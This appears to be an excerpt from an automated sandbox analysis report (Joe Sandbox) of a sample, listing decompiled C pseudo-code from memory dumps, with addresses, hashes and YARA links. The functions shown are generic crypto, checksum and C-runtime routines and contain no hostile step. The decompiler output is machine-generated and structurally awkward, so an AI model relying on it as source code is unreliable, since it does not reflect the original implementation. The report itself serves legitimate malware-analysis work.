				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				signed char _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E00BBF300( &_v32, _a4, 0x20);
				_t141 =  &(( &_v40)[0xc]);
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xbe41a0;
						do {
							_v32 = _v32 ^  *((_t141[0x15 + _t135 * 4] & 0x000000ff) + 0xbe3fa0);
							_v31 = _v31 ^  *((_t141[0x16 + _t135 * 4] & 0x000000ff) + 0xbe3fa0);
							_v30 = _v30 ^  *((_t141[0x17 + _t135 * 4] & 0x000000ff) + 0xbe3fa0);
							_v29 = _v29 ^  *((_t141[0x14 + _t135 * 4] & 0x000000ff) + 0xbe3fa0);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_v40 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_v40;
									 *_t58 = _v40 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_v40 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xbe3fa0);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xbe3fa0);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xbe3fa0);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xbe3fa0);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_v40;
									 *_t79 = _v40 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_v40 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_v40;
										 *_t53 = _v40 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_v40 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _v40 + 4;
											_t133 = _t133 + 1;
											_v40 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x00bae7e6
0x00bae7f6
0x00bae7f9
0x00bae7fe
0x00bae802
0x00bae807
0x00bae80a
0x00bae80c
0x00bae80e
0x00bae812
0x00bae859
0x00bae85c
0x00bae862
0x00bae867
0x00bae876
0x00bae885
0x00bae894
0x00bae8a3
0x00bae8a7
0x00bae8a9
0x00bae8ae
0x00bae8b5
0x00bae8e6
0x00bae8ea
0x00bae8f2
0x00bae8f4
0x00bae8f5
0x00bae8f8
0x00bae8fa
0x00bae8fb
0x00bae8fb
0x00bae900
0x00bae900
0x00bae900
0x00bae90c
0x00bae910
0x00bae91e
0x00bae92d
0x00bae93c
0x00bae94b
0x00bae94f
0x00bae951
0x00bae952
0x00bae952
0x00bae955
0x00bae957
0x00bae958
0x00bae958
0x00bae95d
0x00bae95d
0x00bae95d
0x00bae8b7
0x00bae8ba
0x00bae8c3
0x00bae8c7
0x00bae8cb
0x00bae8cb
0x00bae8cd
0x00bae8cd
0x00bae8d1
0x00bae8d4
0x00bae8d5
0x00bae8da
0x00bae8dd
0x00bae8dd
0x00bae8dd
0x00bae8e4
0x00bae8ba
0x00bae964
0x00bae968
0x00bae9a9
0x00bae9a9
0x00000000
0x00bae96a
0x00bae971
0x00bae99d
0x00bae99d
0x00bae973
0x00bae977
0x00bae97a
0x00bae97e
0x00bae988
0x00bae98c
0x00bae991
0x00bae994
0x00bae995
0x00bae99b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00bae99b
0x00bae97e
0x00bae9a0
0x00bae9a0
0x00bae9a2
0x00bae9a3
0x00bae9a3
0x00bae9a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00bae9a7
0x00bae96a
0x00bae9ac
0x00bae9ac
0x00bae9ac
0x00bae867
0x00000000
0x00bae814
0x00bae81f
0x00bae825
0x00bae829
0x00bae832
0x00bae835
0x00bae838
0x00bae839
0x00bae83c
0x00bae83d
0x00bae841
0x00bae847
0x00000000
0x00000000
0x00000000
0x00bae847
0x00bae849
0x00bae849
0x00bae850
0x00bae852
0x00bae853
0x00bae853
0x00bae857
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00bae857
0x00bae814
0x00bae9bd
0x00bae9bd

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcb825b90c5ca69440cd848459d3cf406b58e379a6f7a9d61220fe6885371b9
Instruction ID: b6753639fe4e2ed16782aabafe4aeb6ddbb4e3eb19069675836f44d3e0838a2d
Opcode Fuzzy Hash: cbcb825b90c5ca69440cd848459d3cf406b58e379a6f7a9d61220fe6885371b9
Instruction Fuzzy Hash: EF518D3190C3D24EC712CF29918456FBFE1AE9B714F4A49DEE4E55B242D230D64ACBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00BAF8A8 Relevance: .1, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E00BAF8A8() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00BC5EC4( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0xbd2a50; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}

0x00baf8b2
0x00baf8b9
0x00baf8bb
0x00baf8be
0x00baf8c5
0x00baf8c9
0x00baf8cc
0x00baf8ce
0x00baf8d5
0x00baf8d9
0x00baf8da
0x00baf8da
0x00baf8df
0x00baf8e3
0x00baf8e6
0x00baf8e9
0x00baf8f7
0x00baf8fa
0x00baf90c
0x00baf90f
0x00baf90f
0x00baf917
0x00baf91b
0x00baf91e
0x00baf921
0x00baf928
0x00baf92f
0x00baf936
0x00baf93d
0x00baf941
0x00baf945
0x00baf94f
0x00baf951
0x00baf955
0x00baf95a
0x00baf969
0x00baf97e
0x00baf982
0x00baf98a
0x00baf98e
0x00baf991
0x00baf995
0x00baf999
0x00baf99b
0x00baf9a0
0x00baf9a7
0x00baf9be
0x00baf9c4
0x00baf9cc
0x00baf9d0
0x00baf9d4
0x00baf9dd
0x00000000
0x00000000
0x00baf94b
0x00baf94b
0x00baf9e3
0x00baf9e7
0x00baf9f2
0x00baf9f8
0x00baf9fd
0x00bafa04
0x00bafa0b
0x00bafa12
0x00bafa15
0x00bafa1c
0x00bafa29

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae0f2917c2f11875c82ba3bce626866a892172e9453d547d54834652f4aa200
Instruction ID: f1ccf404bb558d2a82c8237a92d9f7fbd4e7cddb953ab0531667b1c9d0bd94ac
Opcode Fuzzy Hash: bae0f2917c2f11875c82ba3bce626866a892172e9453d547d54834652f4aa200
Instruction Fuzzy Hash: C8512571A083129FC748CF19D48059AF7E1FF88314F058A2EE899A7741DB34EA59CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3731 Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BB3731(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00BB476B(__ecx) != 0) {
					E00BAA724(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00BAA73B(_t88) >> 8;
					E00BAA724(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E00BAA73B(_t88) >> 8;
					E00BAA724(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E00BAA73B(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}

0x00bb3737
0x00bb373b
0x00bb373e
0x00bb3742
0x00bb3744
0x00bb3748
0x00bb374e
0x00bb3778
0x00bb378b
0x00bb378f
0x00bb3798
0x00bb37a3
0x00bb37a4
0x00bb37ab
0x00000000
0x00000000
0x00bb37b4
0x00bb37b7
0x00bb37c8
0x00bb37cc
0x00bb37d5
0x00bb3810
0x00bb3810
0x00bb3820
0x00bb382d
0x00000000
0x00000000
0x00bb3833
0x00bb3835
0x00bb3838
0x00bb383b
0x00bb3841
0x00bb3845
0x00bb3847
0x00bb3847
0x00bb3849
0x00bb3859
0x00bb385e
0x00000000
0x00bb385e
0x00bb37d7
0x00bb37db
0x00bb37dd
0x00bb37e9
0x00bb37eb
0x00bb37f1
0x00bb37f3
0x00bb37fe
0x00bb3800
0x00bb3803
0x00bb3803
0x00bb3808
0x00bb380c
0x00000000
0x00bb3766
0x00bb3766
0x00000000
0x00bb3766

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 4b14c1f58f1aabea6c22eac19680293b9805d9992f017da8f62dff58fa13a250
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 303146B16087158FCB14DF28C8516AEBBE0FB96700F00496DE495C7342CB78EE49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5F0C Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BA5F0C(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0xbddeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0xbddeb0 + (_t68 >> 0x18) * 4) ^  *(0xbde2b0 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbde6b0 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbdeeb0 + (_t51 >> 0x18) * 4) ^  *(0xbdf2b0 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbdf6b0 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbdeab0 + (_t68 & 0x000000ff) * 4) ^  *(0xbdfab0 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0xbddeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}

0x00ba5f0f
0x00ba5f13
0x00ba5f17
0x00ba5f1c
0x00ba5f1e
0x00ba5f2e
0x00ba5f35
0x00ba5f36
0x00ba5f39
0x00ba5f3c
0x00000000
0x00000000
0x00000000
0x00ba5f3c
0x00ba5f1e
0x00ba5f3e
0x00ba5f41
0x00ba5f4a
0x00ba5f4d
0x00ba5f4d
0x00ba5f4f
0x00ba5f52
0x00ba5faf
0x00ba5fb2
0x00ba5fc6
0x00ba5fc8
0x00ba5fc8
0x00ba5fcd
0x00ba5fd0
0x00ba5fd2
0x00ba5fdd
0x00ba5fe4
0x00ba5fe5
0x00ba5fe5
0x00ba5fd2
0x00ba5fef

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0b3626ab5b2240668d9d566842eca4ea5f9c9a218f638ffd8ba2dab5ff55f7
Instruction ID: d293ff9d7c141f5e48c81dd7e7a91fbc9102225db8699f869d0327e9093378cc
Opcode Fuzzy Hash: 3e0b3626ab5b2240668d9d566842eca4ea5f9c9a218f638ffd8ba2dab5ff55f7
Instruction Fuzzy Hash: F921D731A251714FCB58CF2DDCE0836B7A1E787311346826BFE968B2D4D935E925C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC102 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00BCC102(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xbddd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00BC835E(_t46);
							E00BCBCE1( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00BC835E(_t47);
							E00BCBDDF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00BC835E( *((intOrPtr*)(_t74 + 0x7c)));
						E00BC835E( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00BC835E( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00BC835E( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00BC835E( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00BC835E( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00BCC275( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xbdd818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00BC835E(_t31);
							E00BC835E( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00BC835E(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00BC835E(_t74);
			}

0x00bcc10a
0x00bcc10e
0x00bcc116
0x00bcc11f
0x00bcc124
0x00bcc12b
0x00bcc133
0x00bcc13b
0x00bcc146
0x00bcc14c
0x00bcc14d
0x00bcc155
0x00bcc15d
0x00bcc168
0x00bcc16e
0x00bcc172
0x00bcc17d
0x00bcc183
0x00bcc124
0x00bcc184
0x00bcc18c
0x00bcc19f
0x00bcc1b2
0x00bcc1c0
0x00bcc1cb
0x00bcc1d0
0x00bcc1d9
0x00bcc1e1
0x00bcc1e2
0x00bcc1e8
0x00bcc1eb
0x00bcc1ee
0x00bcc1f5
0x00bcc1f7
0x00bcc1fb
0x00bcc203
0x00bcc20a
0x00bcc210
0x00bcc211
0x00bcc211
0x00bcc218
0x00bcc21a
0x00bcc21f
0x00bcc227
0x00bcc22c
0x00bcc22d
0x00bcc22d
0x00bcc230
0x00bcc233
0x00bcc236
0x00bcc239
0x00bcc239
0x00bcc24b

APIs

___free_lconv_mon.LIBCMT ref: 00BCC146

Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBCFE
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD10
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD22
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD34
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD46
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD58
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD6A
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD7C
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBD8E
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBDA0
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBDB2
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBDC4
Part of subcall function 00BCBCE1: _free.LIBCMT ref: 00BCBDD6

_free.LIBCMT ref: 00BCC13B

Part of subcall function 00BC835E: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?), ref: 00BC8374
Part of subcall function 00BC835E: GetLastError.KERNEL32(?,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?,?), ref: 00BC8386

_free.LIBCMT ref: 00BCC15D
_free.LIBCMT ref: 00BCC172
_free.LIBCMT ref: 00BCC17D
_free.LIBCMT ref: 00BCC19F
_free.LIBCMT ref: 00BCC1B2
_free.LIBCMT ref: 00BCC1C0
_free.LIBCMT ref: 00BCC1CB
_free.LIBCMT ref: 00BCC203
_free.LIBCMT ref: 00BCC20A
_free.LIBCMT ref: 00BCC227
_free.LIBCMT ref: 00BCC23F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e5d5ad80cdb2a0610df01052857d82138ff2a953d9d7afb12311a19613ab6d4a
